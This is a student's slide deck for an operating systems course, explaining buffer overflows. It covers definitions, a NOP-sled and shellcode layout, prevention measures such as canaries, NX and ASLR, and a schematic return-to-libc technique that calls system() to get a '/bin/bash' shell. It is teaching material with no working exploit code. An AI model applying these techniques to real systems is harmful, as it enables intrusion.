BUFFER OVERFLOW

Name: Majed Imad

Course: Operating Systems

1
Date: 17/12/2019
Definition

• From the word “overflow” we can deduce that buffer overflow is a buffer that has been
filled more than it can tolerate.
• A buffer overflow occurs when more data are written to a buffer thus overwriting on the
previous data and causing unpredictable results or crashes.
• Buffer overflows happen when there is improper validation.
Memory Layout Of A Process
Vulnerability

• Some programming languages are more susceptible to buffer overflow issues, such as C
and C++.
• Buffer overflow vulnerabilities are difficult to find and exploit.
• The malicious extra data may contain code designed to trigger specific actions.
• There are two primary types of buffer overflow vulnerabilities: stack overflow and heap
overflow.
How does it work?
NOP-sled

Shellcode Anything Ptr

NOP Shellcode Ptr

How To Prevent a Buffer Overflow?

• The developer must check the input length before using any functions that might cause an
overflow to happen.
• Avoid unsafe functions that can lead to a buffer overflow vulnerability:
printf, sprintf, strcat, strcpy, and gets.
• Protect against buffer overflows by using an extension of a compiler that uses canaries.
How To Prevent a Buffer Overflow?

• OS-level changes:
- NX (non-executable memory)
- ASLR (address space layout randomization)
- Stack smashing protections (Stack-Guard)
Exploitation of protection methods:

• Overwrite the PC
• Let the PC point towards something which can create a shell “/bin/bash”
• Point PC to libc
- System() call can help us create a shell
 Exploitation of protection methods: Return to libc

Buffer[80] EBP return

80 Bytes 4 Bytes 4 Bytes 4 Bytes 4 Bytes

NOP Ptr1 Ptr2 Ptr3

System() Exit() /bin/bash

System() Ptr2 Ptr3

RET Arg 1
Thank You